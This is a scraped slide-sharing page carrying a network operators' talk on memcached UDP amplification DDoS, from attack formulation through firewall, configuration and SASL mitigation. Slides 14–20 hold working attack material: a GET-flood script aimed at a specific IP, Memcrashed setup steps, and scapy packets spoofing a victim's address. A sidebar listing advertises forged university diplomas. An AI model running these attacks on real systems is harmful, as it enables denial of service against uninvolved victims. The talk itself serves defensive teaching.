Route Leak Prevension with BGP Community
Route Leak Prevension with BGP CommunityRoute Leak Prevension with BGP Community
Route Leak Prevension with BGP Community
 
Tale of a New Bangladeshi NIX
Tale of a New Bangladeshi NIXTale of a New Bangladeshi NIX
Tale of a New Bangladeshi NIX
 
MANRS for Network Operators
MANRS for Network OperatorsMANRS for Network Operators
MANRS for Network Operators
 
Re-define network visibility for capacity planning & forecasting with Grafana
Re-define network visibility for capacity planning & forecasting with GrafanaRe-define network visibility for capacity planning & forecasting with Grafana
Re-define network visibility for capacity planning & forecasting with Grafana
 
RPKI ROA updates
RPKI ROA updatesRPKI ROA updates
RPKI ROA updates
 
Blockchain Demystified
Blockchain DemystifiedBlockchain Demystified
Blockchain Demystified
 

Dernier

How to login to Router net ORBI LOGIN...
How to login to Router net ORBI LOGIN...How to login to Router net ORBI LOGIN...
How to login to Router net ORBI LOGIN...rrouter90
 
IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119APNIC
 
Company Snapshot Theme for Business by Slidesgo.pptx
Company Snapshot Theme for Business by Slidesgo.pptxCompany Snapshot Theme for Business by Slidesgo.pptx
Company Snapshot Theme for Business by Slidesgo.pptxMario
 
Cybersecurity Threats and Cybersecurity Best Practices
Cybersecurity Threats and Cybersecurity Best PracticesCybersecurity Threats and Cybersecurity Best Practices
Cybersecurity Threats and Cybersecurity Best PracticesLumiverse Solutions Pvt Ltd
 
Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...
Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...
Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...ICT Watch - Indonesia
 
TRENDS Enabling and inhibiting dimensions.pptx
TRENDS Enabling and inhibiting dimensions.pptxTRENDS Enabling and inhibiting dimensions.pptx
TRENDS Enabling and inhibiting dimensions.pptxAndrieCagasanAkio
 
Unidad 4 – Redes de ordenadores (en inglés).pptx
Unidad 4 – Redes de ordenadores (en inglés).pptxUnidad 4 – Redes de ordenadores (en inglés).pptx
Unidad 4 – Redes de ordenadores (en inglés).pptxmibuzondetrabajo
 
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...vmzoxnx5
 
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)Summary IGF 2013 Bali - English (tata kelola internet / internet governance)
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)ICT Watch - Indonesia
 

Dernier (9)

How to login to Router net ORBI LOGIN...
How to login to Router net ORBI LOGIN...How to login to Router net ORBI LOGIN...
How to login to Router net ORBI LOGIN...
 
IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119
 
Company Snapshot Theme for Business by Slidesgo.pptx
Company Snapshot Theme for Business by Slidesgo.pptxCompany Snapshot Theme for Business by Slidesgo.pptx
Company Snapshot Theme for Business by Slidesgo.pptx
 
Cybersecurity Threats and Cybersecurity Best Practices
Cybersecurity Threats and Cybersecurity Best PracticesCybersecurity Threats and Cybersecurity Best Practices
Cybersecurity Threats and Cybersecurity Best Practices
 
Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...
Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...
Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...
 
TRENDS Enabling and inhibiting dimensions.pptx
TRENDS Enabling and inhibiting dimensions.pptxTRENDS Enabling and inhibiting dimensions.pptx
TRENDS Enabling and inhibiting dimensions.pptx
 
Unidad 4 – Redes de ordenadores (en inglés).pptx
Unidad 4 – Redes de ordenadores (en inglés).pptxUnidad 4 – Redes de ordenadores (en inglés).pptx
Unidad 4 – Redes de ordenadores (en inglés).pptx
 
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
 
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)Summary IGF 2013 Bali - English (tata kelola internet / internet governance)
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)
 

Memcache as udp traffic reflector

  • 1. Memcache as UDP Reflectors: A Massive Amplified DDoS the World (Attack Formulation and Mitigation) Presenter Muhammad Morshed Alam AmberIT Limited morshed@amberit.com.bd <Abror Netwroks> <Shodan Stats>
  • 2. Outlines • Memcache overview • Memcache Variables and Commands • Memcache DDoS Amplification Attack formulation, Amplification Factor • Memcache DDoS Tools (set and get requests, spoof UDP packets) • Mitigation (securing memcache servers using firewall and SASL authentication)
  • 3. Memcached Overview • Free & open source, high-performance, distributed memory object caching system • Uses key-value to store arbitrary data (strings, objects) • Set (key, Data) <= save the data in key Get(key) => give the data from key • add, delete and replace commands to strictly insert/remove data in a key • Optimizes backend database performance by temporarily storing information in cache memory
  • 4. Memcached Mitigates the Load from DB Speed up the Web App Response
  • 5. Install Memcache Service # sudo apt-get update # sudo apt-get install memcached # sudo apt-get install libmemcached-tools Check the running process: root@bdnog-memcace:~# ps aux |grep memcache Output: memcache 207 0.0 0.1 63388 1952 ? Ssl Apr12 0:02 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1
  • 6. Install Memcache Service Contd.. Verify open ports with the ss command or netstat command: # ss -tulpn | grep :11211 # netstat -tulpn | grep :11211 Configuration file: # sudo vi /etc/memcached.conf Service restart process: # sudo systemctl restart memcached
  • 7. Memcache Variables and Commands: Connecting to the Memcache service: root@bdnog-memcace:~# telnet 127.0.0.1 11211 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. stats STAT pid 12476 STAT uptime 20 STAT time 1524726956 STAT version 1.4.25 Ubuntu STAT libevent 2.0.21-stable STAT pointer_size 64 STAT rusage_user 0.008000 STAT rusage_system 0.004000 STAT curr_connections 1 STAT total_connections 2 STAT connection_structures 2 STAT reserved_fds 20 STAT cmd_get 0 STAT cmd_set 0 STAT cmd_flush 0 STAT cmd_touch 0 STAT get_hits 0 STAT get_misses 0 STAT delete_misses 0 STAT delete_hits 0 STAT incr_misses 0 STAT incr_hits 0 STAT decr_misses 0 STAT decr_hits 0 STAT cas_misses 0 STAT cas_hits 0 STAT cas_badval 0 STAT touch_hits 0 STAT touch_misses 0 STAT auth_cmds 0 STAT auth_errors 0 STAT bytes_read 7 STAT bytes_written 0 STAT limit_maxbytes 67108864 STAT accepting_conns 1 STAT listen_disabled_num 0 STAT time_in_listen_disabled_us 0 STAT threads 4 STAT conn_yields 0 STAT hash_power_level 16 STAT hash_bytes 524288 STAT hash_is_expanding 0 STAT malloc_fails 0 STAT bytes 0 STAT curr_items 0 STAT total_items 0 STAT expired_unfetched 0 STAT evicted_unfetched 0 STAT evictions 0 STAT reclaimed 0 STAT crawler_reclaimed 0 STAT crawler_items_checked 0 STAT lrutail_reflocked 0 END
  • 8. Memcache-tools and outputs # Setting data for a Key : set key 0 3600 16 Welcome to BDNog STORED # Getting return the value of key: get key VALUE key 0 16 Welcome to BDNog END Using of libmemcached-tools command: root@bdnog-memcace:~# memcstat --servers 127.0.0.1 Output: Give the present status of all memcache variables, i.e., STAT cmd_get 1 STAT cmd_set 1 root@bdnog-memcace:~# memcdump --servers 127.0.0.1 Output: All available keys that holding the data of cache, i.e., Key root@bdnog-memcace:~# memcat --servers 127.0.0.1 key Output: return the value of that key, i.e., Welcome to BDNog set <keyname> <some_flag> <expiration_in_millseconds> <length_of_data_to_follow>
  • 9. Vulnerable Memcached Server • No authentication required to access • unauthorized inject big payload in cache • Listen on unreliable UDP/Port 11211 from any IP address • UDP allows unreliable data delivery, Target hosts receive data without prior consent stats of vulnerable memcached services available in internet (Qrator Lab and Akamai)
  • 10. 1. Finds a memcache vulnerable server listening at UDP , port 11211 and high max size value of the variable limit_maxbytes 2. Run a memcache SET command and fills 1 key to it’s max size with data to ensure high payload 3. Sends multiple forged GET requests for that key using continuous UDP and spoof victim IP Attacker’s UDP Packets Contained: •UDP GET key requests •Size: 15B, SRC IP: spoof Target IP, DST Port:11211, Des. IP: Memcahe Host Vulnerable Memcached servers exposed at Internet and listening at UDP, Port: 11211 <Victims/Targets>  GET commands reflected to the victim IP with (key, value)  Value of DATA is high, i.e, T. Size=(key, value)*# of requests  GET Request 15B=> 750kB response, 50000x amplification (Akamai Report)  SRC IP: Memcache host, DST IP: Target, SRC Port: 11211 Attack Formulation
  • 11. 1. Attacker may user multiple vulnerable memcached servers to a specific target IP by spoofing the SRC IP 2. Target network infra. overwhelmed with UDP Traffic Memcache Amplification DDoS on bandwidth consumption
  • 12. Trends of Protocols Used for Reflection Most DDoS counted for Memcache (DDoSmon stats)
  • 13. DDoS attack bandwidth 1.3 Tbps on Github !!!
  • 14. Memcached Reflection Power Inserting key value to a vulnerable memcached server: # apt-get install python-memcache # python >>> import memcache >>> mc=memcache.Client([‘1.2.3.4:11211'],debug=True) >>> mc.set(‘tot2',3423443534324234234234234) True >>> mc.get(‘tot2') 3423443534324234234234234 Max Key Value (size) => 1 MB, repeating the get request for 1024 times => 1024 MB (1GB) reflected UDP Traffic !!!! 
  • 15.
  • 16. Flooding the resource with Reflected UDP Traffic: # touch get_flood.py #!/usr/bin/env python import memcache mc = memcache.Client([‘202.4.96.85:11211'],debug=True) mc.set('tot2',1347534875923423432423) for i in range(10000): mc.get('tot2') print i root@morshed-Lenovo-G40-70:~#python get_flood.py MemCached: MemCache: inet:202.4.96.85:11211: connect: timed out. Marking dead.
  • 19. Dump Output Packets (PPS Curve) :
  • 20. Memcached DDoS Tools Sends forged UDP packets (Spoof the SRC IP/Target IP) to vulnerable Memcached servers obtained using Shodan API # git clone https://github.com/649/Memcrashed-DDoS-Exploit.git # apt-get install python3 # pip install shodan ;search engine # pip install scapy ; require to manipulate UDP packets Pass the API key collected from https://account.shodan.io/login and put the target victim IP address to run the attack # python3 Memcrashed.py ;x00injected is the key and some arbitary value in inserted to cache setdata = ("x00x00x00x00x00x00x00x00setx00injectedx000x003600x00%srn%srn" getdata = ("x00x00x00x00x00x00x00x00getx00injectedrn") ;using scapy SRC IP manupluation and sending get request on behalf of victim/Target IP send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata) send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata)
  • 23. Step-1: Configuring The Firewall: For TCP: # /sbin/iptables -A INPUT -p tcp -s 172.16.11.0/24 --dport 11211 -j ACCEPT # /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP For UDP: # /sbin/iptables -A INPUT -p udp -s 172.16.11.0/24 --dport 11211 -j ACCEPT # /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP Or permanently Disable for zimbra colaboration: # /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP # /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP Note: Save the iptables rules and check the rules # iptables –L -v -n Secure memcached server to avoid DDoS amplification attacks
  • 24. Step-2: Changing the Configuration: # sudo vim /etc/memcached.conf -l 127.0.0.1,172.16.3.1 ;listening from localhost and trusted block -U 0 ;disable UDP 11211 listening # sudo systemctl restart memcached Secure memcached server to avoid DDoS amplification attacks contd…
  • 25. Validation of filtering rules: # nc 202.4.96.144 11211 # nc -u 202.4.96.144 11211 # telnet 202.4.96.144 11211 # sudo nmap 202.4.96.144 -p 11211 -sU -sS --script memcached- info
  • 26. Adding Authorized user using SASL to Memcached Server: # memcstat --servers="127.0.0.1“ Output: Server: 127.0.0.1 (11211) pid: 3831 uptime: 9 time: 1520028517, version: 1.4.25 . . . SASL helps to add authentication for memcached servers clients. # sudo vim /etc/memcached.conf -S ;enable SASL -vv ;enable verbose output to /var/log/memcached Save and close the file. # sudo systemctl restart memcached # sudo journalctl -u memcached Output: Apr 27 22:03:58 memcached systemd-memcached-wrapper[2760]: Initialized SASL.
  • 27. Adding Authorized user using SASL to Memcached Server: # sudo apt-get install sasl2-bin ; SASL user database # sudo mkdir -p /etc/sasl2 # sudo vi /etc/sasl2/memcached.conf mech_list: plain log_level: 5 sasldb_path: /etc/sasl2/memcached-sasldb2 # sudo saslpasswd2 -a memcached -c -f /etc/sasl2/memcached- sasldb2 morshed # sudo systemctl restart memcached # memcstat --servers="127.0.0.1" --username=morshed --password=*passwd*